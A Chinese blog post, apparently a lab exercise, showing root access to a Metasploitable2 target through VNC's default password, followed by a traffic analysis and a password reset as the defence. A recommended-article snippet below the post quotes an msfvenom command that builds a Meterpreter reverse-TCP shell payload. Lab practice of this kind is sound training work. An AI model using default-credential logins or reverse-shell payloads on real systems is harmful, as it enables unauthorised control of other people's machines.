基于Ubuntu系统的VNC链接漏洞复现

最新推荐文章于 2023-07-19 10:04:49 发布
最新推荐文章于 2023-07-19 10:04:49 发布
阅读量666 收藏 1
点赞数
文章标签: ubuntu 网络 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/liuguangshibei/article/details/125449064
版权

环境说明

攻击机:kali
靶机:基于Ubuntu8的metasploitable2系统
靶机开放服务:无

信息收集

nmap扫描找到当前网段存活主机,并发现目标主机操作系统为Linux 2.6.X,IP地址为:192.168.2.71,可见靶机中开放了21、445、3306等大量端口。
在这里插入图片描述
在这里插入图片描述利用nessus扫描发现大量漏洞:
在这里插入图片描述

渗透测试:

发现靶机存在VNC密码为默认的“password”情况。所以决定利用该漏洞:
在这里插入图片描述
打开VNC进行链接:
在这里插入图片描述
Sever输入靶机的IP地址,password输入默认“password”,回车,返回靶机root权限:
在这里插入图片描述
获取靶机中指定文件:
在这里插入图片描述

攻击流量分析

在kali中输入sever地址,通过TCP三次握手建立TCP链接,输入password密码,kali向靶机发出sever链接请求,靶机回应链接成功,成功建立VNC链接,并回传TCP确认帧ACK:
在这里插入图片描述
返回PSH帧,产生与靶机的数据传输:
在这里插入图片描述
关闭VNC,返回TCP的FIN帧,链接关闭:
在这里插入图片描述

靶机防御:

在靶机中重设VNC密码:
在这里插入图片描述
攻击机中无法登录:
在这里插入图片描述

流光拾贝
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
VNC漏洞发现扫描探测发现器
06-05
超实用的VNC扫描器,用于VNC服务探测,亲测有效,有效。
3. Ubuntu系统中文化、安装中文输入法、解决VNCubuntu后无法复制粘贴问题
01-08
VNC连接Ubuntu,将windows上文字可复制粘贴到Ubuntu上 输入命令行 $ autocutsel $ sudo apt install autocutsel 完成安装后即可将本机内内容复制粘贴到VNC里 参考文档1:vnc viewer中开启剪切板复制内容到ubuntu系统中 参考文档2:VNC viewer(win10)与Ubuntu16互通【复制、粘贴】 参考文档3:Windows的VNC客户端连接Linux无法复制粘贴 出现这个后,便可进行复制粘贴 系统中文化 方法一: 参考文档:为ECS中的Ubuntu14.04安装中文语言支持 注:记得使用sudo执行命令哦 方法二
Ubuntu20.04 VNC 安装与设置实现
09-14
主要介绍了Ubuntu20.04 VNC 安装与设置实现,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友们下面随着小编来一起学习学习吧
ubuntu系统vnc一键使用
10-16
vnc文件,见博客:https://blog.csdn.net/qq754261595/article/details/109123871
vnc漏洞检测和复现工具
11-11
vnc漏洞检测和复现工具 5900端口
VNC 未授权访问漏洞复现
热门推荐
W小哥
09-23 1万+
一、VNC 简介 VNC 是虚拟网络控制台Virtual Network Console的英文缩写。它是一款优秀的远程控制工具软件由美国电话电报公司AT&T的欧洲研究实验室开发。VNC是基于 UNXI 和 Linux 的免费开源软件由 VNC Server 和 VNC Viewer 两部分组成。VNC 默认端口号为 5900、5901。 二、VNC 未授权访问漏洞危害 VNC 未授权访问漏洞如被利用可能造成恶意用户直接控制目标主机。 三、靶场搭建 服务器: win10 IP: 192.168.241
6-24漏洞利用-vnc密码破解
山兔的博客
08-01 3665
VNC(VirtualNetworkConsole)是虚拟网络控制台的缩写。它是一款优秀的远程控制工具软件,由著名的AT&T的欧洲研究实验室开发的。主要是用来可视化控制,类似于远程桌面,我们之前接触的ssh、rlogin都是命令行的控制终端,但是VNC跟远程桌面,又有一点不同,远程桌面,开放的是3389,而VNC服务端默认运行在5900端口5900端口,开放的一般是VNC服务端。...
web渗透测试----5、暴力破解漏洞--(3)FTP密码破解
七天
06-23 1621
FTP暴力破解
VNC Brute Force Login复现详细过程
weixin_69925635的博客
07-19 172
使用kali linux针对metasploittable实现VNC爆破的详细过程
9、VNC登录认证漏洞扫描
无痕的博客
12-13 1018
metasploit,VNC登录认证漏洞扫描
vnc安全漏洞
ziruominglin的专栏
07-12 6187
查看进程:ps -ef|grep -i vnc ,然后关掉 service vnc status  service vnc stop
常见未授权访问漏洞总结
mingyqf的博客
01-18 3401
常见未授权访问漏洞总结 https://xz.aliyun.com/t/6103#toc-12 小维 / 2019-08-28 09:10:00 / 浏览数 46708 安全技术 众测渗透[顶(13)](javascript:) [踩(0)](javascript:) 本文仅限技术研究与讨论,严禁用于非法用途,否则产生的一切后果自行承担。 常见的未授权访问漏洞: Redis 未授权访问漏洞 MongoDB 未授权访问漏洞 Jenkins 未授权访问漏洞 Memcached 未授权访问漏洞 JBOSS 未
服务攻防-应用协议-远控软件漏洞&向日葵&VNC&TV-平台漏洞&Kibana&Zabbix-附真实案例演示
ran的博客
05-11 2219
VNC (Virtual Network Computing) 是一种远程桌面协议,可以通过网络在远程计算机上查看和控制桌面。VNC是基于客户端-服务器模型的,客户端通过VNC协议与远程服务器建立连接,并在本地显示远程计算机的桌面内容。VNC协议支持多种操作系统和平台,包括Windows、Linux、MacOS和Android等。VNC协议使用了一系列TCP/IP端口,具体端口号取决于使用的VNC实现和配置方式。通常,VNC服务器使用的默认端口号是5900。
VNC密码验证绕过漏洞攻击案例(2)
gxj022的专栏
09-30 3120
[转]http://book.51cto.com/art/200810/95037.htm ·  摘要:《黑客攻防实战案例解析》第3章网络攻击案例,本章则通过密码扫描、漏洞攻击、社会工程学攻击、以及SQL注入攻击等精选案例来介绍如何实施攻击并最终控制被攻击计算机。本小节讲述的是VNC密码验证绕过漏洞攻击案例。    3.2.4  VNC密码验证绕过漏洞攻击案例(2)
关于VNC漏洞的利用方法总结
weixin_33747129的博客
07-19 2393
vnc漏洞是一个相对较新的。关于漏洞本身我不想做太多的讲解。只是关于其使用方法进行了一些研究。 1。需要通过vncscan进行vnc版本的确定,确定是否存在漏洞。 2。用ue将有漏洞的ip地址给提炼出来。 3。使用lscanport等工具再次检验该主机5900端口是否存活 4。使用link连接器进行连接。连接有两种方式,一个是手工一个个的进行测试,另外一个就是成批量的进行测试,格式如下: ...
【kali-漏洞利用】(3.3)Metasploit后渗透(下):后渗透模块使用
08-06 642
【kali-漏洞利用】后渗透模块利用
完美实现windows远程连接ubuntu18.04(用vnc),并破解需要license的要求
weixin_42294118的博客
12-12 3809
windows内网情况下远程ubuntu18.04方法
CVE-2018-4878 漏洞复现
qq_42039946的博客
05-14 1062
1.生成shellcode msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.8.130 lport=8888 -f python>shellcode.txt lhost的修改为自己kali平台的IP,端口号也可以自行修改 2.查看shellcode root@kali:~# cat shellcode.txt 3.编辑CVE-2018-4878-master.py文件 3.1 替换shellcode 3.2修改swf..
vnc链接Ubuntu
最新发布
08-18
1. 首先,确保您的Ubuntu系统已经安装了VNC服务器软件。您可以使用以下命令安装TightVNC Server: ``` sudo apt update sudo apt install tightvncserver ``` 2. 安装完成后,运行以下命令来设置VNC连接密码:...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值